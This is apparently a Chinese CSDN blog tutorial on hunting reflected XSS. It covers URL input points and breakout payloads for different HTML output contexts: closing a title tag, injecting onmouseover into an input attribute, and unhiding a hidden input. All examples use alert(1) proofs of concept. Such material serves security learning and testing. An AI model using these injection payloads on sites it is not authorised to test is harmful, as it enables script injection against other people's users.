xss挖掘思路分享_WEB安全(二) :XSS的漏洞挖掘(上)

最新推荐文章于 2024-05-28 15:44:37 发布
最新推荐文章于 2024-05-28 15:44:37 发布
阅读量665 收藏 5
点赞数
文章标签: xss挖掘思路分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28829479/article/details/112525977
版权

e3b1c2143c51731f873e0acbc570aa47.png

ps:上一篇讲了基本的xss类型,反射型和存储型,以及xss可以做的一些事情。本文则比较上一篇做一个较为深入的研究。如何在网站上面进行漏洞的一些挖掘

挖掘思路

1,url

我们知道这类xss的输入点在URL上面,首先,我们对URL的组成进行如下介绍

 <scheme>://<netloc>/<path>?<query>#<fragment>
 //比如一个最普通的url如下:
 http://www.foo.com/path/f.html?id=1#type=2#new
 对应的关系则如下表示
 <scheme> : http
 <netloc> :  www.foo.com
 <path> :  /path/f.html
 <query> :  id=1&type=2
 <fragment> :  new

对于这个url来说,攻击的地方有 path,query,fragment,但是fragment的值一般不会出现在url上面,所以就剩下 path,query了

首先我们从query入手,来看一个最简单的url

http://www.foo.com/path/f.html?id=1

当我们进行xss测试时候,可以塞入如下代码

<script>alert(1)</script>
'"><script>alert(1)</script>
<img/src=@ onerror=alert(1) />

这样根据请求,我们就可以测试网上是否有弹出框,有则表示可以进行xss攻击,针对这个URL,我们利用输入点是id=1,那么输出点在哪呢很可能出现在如下位置

<div>[输出]</div>
<input type='text' value=[输出] />
<scrpit>a = [输出]; </script>

基本以上就这三种情况,不过真要对这三种情况进行细分的话,里面的陷阱也是千奇百怪

2 html

最普通的场景出现<div>[输出]</div>,那么我们修改这样的url

http://www.foo.com/path/f.html?id=1<script>alert(1)</script>
div的内容就会变化成如下代码
<div>1<script>alert(1)</script></div>

这样的话,代码就会执行注入,但是当出现如下标签

<title></title>
<textarea></textarea>
<iframe></iframe>

比如代码是这样的

<title><script>alert(1)</script></title>

这样可以很明确的告诉你,是不会弹出提示框的。因为这个标签无法执行脚本,xss漏洞的挖掘必须具备这样的区分能力,像这种标签还有很多。以上介绍的三个只是在工作中经常出现的。这种标签的话,如果要进行xss攻击,需要将代码修改如下

<title><script>alert(1)</script></title>   //原代码

<title>[输出代码如下]</title>
</title><script>alert(1)</script>

<title></title><script>alert(1)</script> </title>  //完整代码

除了这些,还有两类特殊标签,script 和 style 这种标签是不能被嵌套的。而且构造更灵活,除了闭合标签外,还可以利用他们自身可执行脚本的性质来构造特殊的xss进行入侵

标签之内如何进行xss,如出现如下场景

<input type='text' value="[输出]" />

//那么我们输出位可以这样编写如下两种写法

" onmouseover=alert(1) x="   //闭合属性,使用on时间触发
<input type='text' value="" onmouseover=alert(1) x="" />  //完整代码

"><script>alert(1)</script>   //闭合属性后闭合标签,执行脚本
<input type='text' value=""><script>alert(1)</script> " />  //完整代码

接下来我们继续看html标签的其他场景。出现如下语句

<input type="hidden" value="[输出]">

像这种情况,我们只能闭合标签,否则由于hidden的特性触发不了xss,但是如下换个位置的话,情况就不一样了

<input value="[输出]" type="hidden" />

可以输出这样
1" onmouseover=alert(1) type="text

<input value="1" onmouseover=alert(1) type="text" type="hidden" /> //完整代码

这样输出不在是一个隐藏表单,而是一个标准的输入框

3,请求玄机

针对输入输出进行了分析后,在xss中的漏洞挖掘工具,我们也可以做很多优化,在这里我们举例探子请求,如果出现响应的话,就说明有漏洞可以进行挖掘

以上就是漏洞深挖的一些思路部分,接下来会讲解html和javascript的自解码机制,这样会帮助大家从更为刁钻的方法进行挖掘

笑技
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xxs漏洞挖掘思路
Candour_0的博客
03-14 326
xxs漏洞挖掘思路
web安全&漏洞挖掘.zip(文)
10-15
在“Web安全&漏洞挖掘.zip”这个压缩包,我们可以找到一系列关于网络安全、特别是Web安全领域的资源,包括漏洞挖掘的思想、Web应用的业务与逻辑缺陷分析、模糊测试的方法以及Web安全的基础知识。以下是对这些主题...
第一节 自动化xss挖掘介绍-01
09-15
第一节 自动化xss挖掘介绍-01
(干货)SRC漏洞挖掘项目实战经验分享
最新发布
Cairo_A的博客
05-28 712
分享一些SRC漏洞挖掘项目实战经验
Web安全系列(三):XSS 攻击进阶(挖掘漏洞)
weixin_33950035的博客
09-18 412
前言 在前些章节 (web安全系列(一):XSS 攻击基础及原理)以及(Web安全系列():XSS 攻击进阶(初探 XSS Payload)),我详细介绍了 XSS 形成的原理以及 XSS 攻击的分类,并且编写了一个小栗子来展示出 XSS Payload 的危害。 目前来说,XSS 的漏洞类型主要分为三类:反射型、存储型、DOM型,在本篇文章当会以permeate生态测试系统为例,分析网站功...
WEB漏洞挖掘-XSS基础与利用(概念,类型,场景,危害)
sui_luan的博客
02-09 554
跨站脚本攻击漏洞概述 跨站脚本攻击漏洞类型及场景 XSS常用的绕过方式 跨站脚本攻击漏洞实操
XSS漏洞挖掘-进阶
qq_27278819的博客
09-25 303
如果你还对XSS有些陌生,可以先去看下面这两篇文章,第篇是连载,可以仔细看一看XSS总结 - 先知社区Web安全从零开始-XSS I - Zedd’s Blog那些年我们一起学XSS最后一篇文章是精髓,我就是因为看了这篇文章之后XSS功力突飞猛进首先先要了解该网站的业务,判断哪些地方可能存在XSS漏洞,比如:发布文章、设置头像、地址、昵称、用户的其它个人资料等,大部分企业都有WEB端和移动端,有些移动端修改的资料,可以显示在WEB端某个地方且目前移动端的XSS防御较弱,我的好多XSS也都是从移动端。
WEB漏洞挖掘——思路指南
weixin_59191169的博客
02-29 1031
本篇主要记录了WEB漏洞挖掘学习过程的信息收集部分,web渗透最重要的便是信息收集,希望以下内容能够给予同在漏洞挖掘学习的小伙伴一些帮助,若有不足之处可以告诉我,大家一起努力进步。大佬路过也请多多指点!
XSS利用与挖掘-_更新版.rar_Exploit_XSS_XSS 利用_pkav_web exploit
09-23
**XSS(跨站脚本攻击)是一种常见的网络安全漏洞,主要出现在Web应用程序。这种攻击方式允许攻击者通过注入恶意...在日常开发,应当时刻保持警惕,遵循安全编码原则,定期进行安全审计,及时修复发现的XSS漏洞。
XSS漏洞挖掘安全防护.pdf
08-08
XSS相关漏洞一直是无法忽略的问题,即使再好的开发工程师也避免不了写出”不安全”的代码,这次议题将深入浅出的介绍一下XSS漏洞形成与危害。
Flash XSS漏洞挖掘1
08-03
【Flash XSS漏洞挖掘1】 Flash XSS(跨站脚本)漏洞是网络安全领域一个重要的问题,尤其是在企业级的Bug Bounty活动。尽管这个概念并不新鲜,早在2002年就已经有相关的技术出现,但近期在Apple、Amazon、Adobe...
xss挖掘思路分享_发现 XSS 漏洞的一般做法有哪些?
weixin_39747615的博客
12-24 623
对于XSS漏洞挖掘过程,其实就是一个使用Payload不断测试和调整再测试的过程,这个过程我们把它叫做Fuzzing;同样是Fuzzing,有些人挖洞比较高效,有些人却不那么容易挖出漏洞,除了掌握的技术之外,比如编码的绕过处理等,还包含一些技巧性的东西,掌握一些技巧和规律,可以使得挖洞会更加从容。XSS应该是我挖过的最多漏洞的一种Web漏洞类型,累积下来,就国内BAT、金山、新浪、网易等这些互联...
网站漏洞挖掘思路
qq_53058639的博客
03-14 548
未授权访问未授权访问漏洞,是在攻击者没有获取到登录权限或未授权的情况下,不需要输入密码,即可通过输入网站控制台主页面地址或者不允许查看的连接便可进行访问,同时进行操作。sql注入、万能密码我们在用户名输入'or 1=1#,密码随意。就变成了select name.passwd from users where username='' or 1=1#’ and password=。
Web渗透测试之SRC挖掘经验分享
03-30
专注培养高薪网络安全人才,帮助大家了解并学习网络安全,传授黑白帽实战技能,带领零基础小白正式踏入入门阶段。把所有漏洞作为总结讲解,从理论到实战的分享,所有经验。结合漏洞挖掘的经验以及安全工作相关的经验总结漏洞原理、发现、利用,修复,姿势,防御,等多方面思路。实战方面结合以往挖掘SRC经验,把如何操作的各种方法和经验,以及挖过的漏洞,全部分享。具备web渗透测试工程师的工作水平; 能够挖掘各家SRC应急响应心漏洞,凭借挖漏洞月收入过万
【应用安全——XSS】input-hidden
Fly_鹏程万里
02-22 790
1、使用expression突破 &lt;input type=hidden style="x:expression(alert(/xss/))"&gt; 直接利用CSS的expression属性来实现突破,此技巧适用于IE6及以下的浏览器。 2​、使用accesskey突破 &lt;input type="hidden" accesskey="X" onclick="alert(/x...
XSS注入方式和逃避XSS过滤的常用方法(整理)
weixin_34050427的博客
09-16 758
(转自黑吧安全网http://www.myhack58.com/) web前端开发常见的安全问题就是会遭遇XSS注入,而常见的XSS注入有以下2种方式: 一、html标签注入 这是最常见的一种,主要入口为表单项(一般就是正则过滤不周全)、内联样式表(exploer) 正则过滤的解决办法,php一般会使用htmlspecialchars或者html...
XSS漏洞挖掘与验证
weixin_42109829的博客
12-04 1480
挖掘的方法: 1、手工挖掘 方法:靠闭合标签加一些限制绕过等等的 标签闭合配合浏览器的测试,因为有时候提交的那些表单里面是限制长度的,所以我们可以: (1)用bp进行抓包改包,进行探测。 (2)直接在前端修改源代码进行修改长度限制。 挖掘验证思路: 1、先找数据交互的地方 用户输入点、输出点、文件上传地方、flash、在url当,get的地方,有注入的 地方,这...
理解XSS漏洞:挖掘、防护与分类解析
"XSS漏洞挖掘安全防护" XSS(Cross Site Scripting)漏洞是网络安全领域的一个...XSS漏洞挖掘与防护是Web应用安全的核心部分,需要开发者和安全专家共同努力,通过合理的编码实践、安全配置和持续的监控来降低风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值